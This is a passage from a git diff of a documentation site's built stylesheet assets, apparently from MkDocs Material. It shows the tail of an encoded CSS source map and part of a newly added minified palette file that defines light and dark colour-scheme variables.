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","file":"main.css"}
\ No newline at end of file
diff --git a/assets/stylesheets/palette.ecc896b0.min.css b/assets/stylesheets/palette.ecc896b0.min.css
new file mode 100644
index 000000000..35420eb6f
--- /dev/null
+++ b/assets/stylesheets/palette.ecc896b0.min.css
@@ -0,0 +1 @@
+@media screen{[data-md-color-scheme=slate]{--md-hue:232;--md-default-fg-color:hsla(var(--md-hue),75%,95%,1);--md-default-fg-color--light:hsla(var(--md-hue),75%,90%,0.62);--md-default-fg-color--lighter:hsla(var(--md-hue),75%,90%,0.32);--md-default-fg-color--lightest:hsla(var(--md-hue),75%,90%,0.12);--md-default-bg-color:hsla(var(--md-hue),15%,21%,1);--md-default-bg-color--light:hsla(var(--md-hue),15%,21%,0.54);--md-default-bg-color--lighter:hsla(var(--md-hue),15%,21%,0.26);--md-default-bg-color--lightest:hsla(var(--md-hue),15%,21%,0.07);--md-code-fg-color:hsla(var(--md-hue),18%,86%,1);--md-code-bg-color:hsla(var(--md-hue),15%,15%,1);--md-code-hl-color:#4287ff26;--md-code-hl-number-color:#e6695b;--md-code-hl-special-color:#f06090;--md-code-hl-function-color:#c973d9;--md-code-hl-constant-color:#9383e2;--md-code-hl-keyword-color:#6791e0;--md-code-hl-string-color:#2fb170;--md-code-hl-name-color:var(--md-code-fg-color);--md-code-hl-operator-color:var(--md-default-fg-color--light);--md-code-hl-punctuation-color:var(--md-default-fg-color--light);--md-code-hl-comment-color:var(--md-default-fg-color--light);--md-code-hl-generic-color:var(--md-default-fg-color--light);--md-code-hl-variable-color:var(--md-default-fg-color--light);--md-typeset-color:var(--md-default-fg-color);--md-typeset-a-color:var(--md-primary-fg-color);--md-typeset-mark-color:#4287ff4d;--md-typeset-kbd-color:hsla(var(--md-hue),15%,94%,0.12);--md-typeset-kbd-accent-color:hsla(var(--md-hue),15%,94%,0.2);--md-typeset-kbd-border-color:hsla(var(--md-hue),15%,14%,1);--md-typeset-table-color:hsla(var(--md-hue),75%,95%,0.12);--md-typeset-table-color--light:hsla(var(--md-hue),75%,95%,0.035);--md-admonition-fg-color:var(--md-default-fg-color);--md-admonition-bg-color:var(--md-default-bg-color);--md-footer-bg-color:hsla(var(--md-hue),15%,12%,0.87);--md-footer-bg-color--dark:hsla(var(--md-hue),15%,10%,1);--md-shadow-z1:0 0.2rem 0.5rem #0003,0 0 0.05rem #0000001a;--md-shadow-z2:0 0.2rem 0.5rem #0000004d,0 0 0.05rem #00000040;--md-shadow-z3:0 0.2rem 0.5rem #0006,0 0 0.05rem #00000059;color-scheme:dark}[data-md-color-scheme=slate] img[src$="#gh-light-mode-only"],[data-md-color-scheme=slate] img[src$="#only-light"]{display:none}[data-md-color-scheme=slate][data-md-color-primary=pink]{--md-typeset-a-color:#ed5487}[data-md-color-scheme=slate][data-md-color-primary=purple]{--md-typeset-a-color:#bd78c9}[data-md-color-scheme=slate][data-md-color-primary=deep-purple]{--md-typeset-a-color:#a682e3}[data-md-color-scheme=slate][data-md-color-primary=indigo]{--md-typeset-a-color:#6c91d5}[data-md-color-scheme=slate][data-md-color-primary=teal]{--md-typeset-a-color:#00ccb8}[data-md-color-scheme=slate][data-md-color-primary=green]{--md-typeset-a-color:#71c174}[data-md-color-scheme=slate][data-md-color-primary=deep-orange]{--md-typeset-a-color:#ff9575}[data-md-color-scheme=slate][data-md-color-primary=brown]{--md-typeset-a-color:#c7846b}[data-md-color-scheme=slate][data-md-color-primary=black],[data-md-color-scheme=slate][data-md-color-primary=blue-grey],[data-md-color-scheme=slate][data-md-color-primary=grey],[data-md-color-scheme=slate][data-md-color-primary=white]{--md-typeset-a-color:#6c91d5}[data-md-color-switching] *,[data-md-color-switching] :after,[data-md-color-switching] :before{transition-duration:0ms!important}}[data-md-color-accent=red]{--md-accent-fg-color:#ff1947;--md-accent-fg-color--transparent:#ff19471a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=pink]{--md-accent-fg-color:#f50056;--md-accent-fg-color--transparent:#f500561a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=purple]{--md-accent-fg-color:#df41fb;--md-accent-fg-color--transparent:#df41fb1a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=deep-purple]{--md-accent-fg-color:#7c4dff;--md-accent-fg-color--transparent:#7c4dff1a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=indigo]{--md-accent-fg-color:#526cfe;--md-accent-fg-color--transparent:#526cfe1a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=blue]{--md-accent-fg-color:#4287ff;--md-accent-fg-color--transparent:#4287ff1a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=light-blue]{--md-accent-fg-color:#0091eb;--md-accent-fg-color--transparent:#0091eb1a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=cyan]{--md-accent-fg-color:#00bad6;--md-accent-fg-color--transparent:#00bad61a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=teal]{--md-accent-fg-color:#00bda4;--md-accent-fg-color--transparent:#00bda41a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=green]{--md-accent-fg-color:#00c753;--md-accent-fg-color--transparent:#00c7531a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=light-green]{--md-accent-fg-color:#63de17;--md-accent-fg-color--transparent:#63de171a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=lime]{--md-accent-fg-color:#b0eb00;--md-accent-fg-color--transparent:#b0eb001a;--md-accent-bg-color:#000000de;--md-accent-bg-color--light:#0000008a}[data-md-color-accent=yellow]{--md-accent-fg-color:#ffd500;--md-accent-fg-color--transparent:#ffd5001a;--md-accent-bg-color:#000000de;--md-accent-bg-color--light:#0000008a}[data-md-color-accent=amber]{--md-accent-fg-color:#fa0;--md-accent-fg-color--transparent:#ffaa001a;--md-accent-bg-color:#000000de;--md-accent-bg-color--light:#0000008a}[data-md-color-accent=orange]{--md-accent-fg-color:#ff9100;--md-accent-fg-color--transparent:#ff91001a;--md-accent-bg-color:#000000de;--md-accent-bg-color--light:#0000008a}[data-md-color-accent=deep-orange]{--md-accent-fg-color:#ff6e42;--md-accent-fg-color--transparent:#ff6e421a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-primary=red]{--md-primary-fg-color:#ef5552;--md-primary-fg-color--light:#e57171;--md-primary-fg-color--dark:#e53734;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=pink]{--md-primary-fg-color:#e92063;--md-primary-fg-color--light:#ec417a;--md-primary-fg-color--dark:#c3185d;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=purple]{--md-primary-fg-color:#ab47bd;--md-primary-fg-color--light:#bb69c9;--md-primary-fg-color--dark:#8c24a8;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=deep-purple]{--md-primary-fg-color:#7e56c2;--md-primary-fg-color--light:#9574cd;--md-primary-fg-color--dark:#673ab6;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=indigo]{--md-primary-fg-color:#4051b5;--md-primary-fg-color--light:#5d6cc0;--md-primary-fg-color--dark:#303fa1;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=blue]{--md-primary-fg-color:#2094f3;--md-primary-fg-color--light:#42a5f5;--md-primary-fg-color--dark:#1975d2;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=light-blue]{--md-primary-fg-color:#02a6f2;--md-primary-fg-color--light:#28b5f6;--md-primary-fg-color--dark:#0287cf;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=cyan]{--md-primary-fg-color:#00bdd6;--md-primary-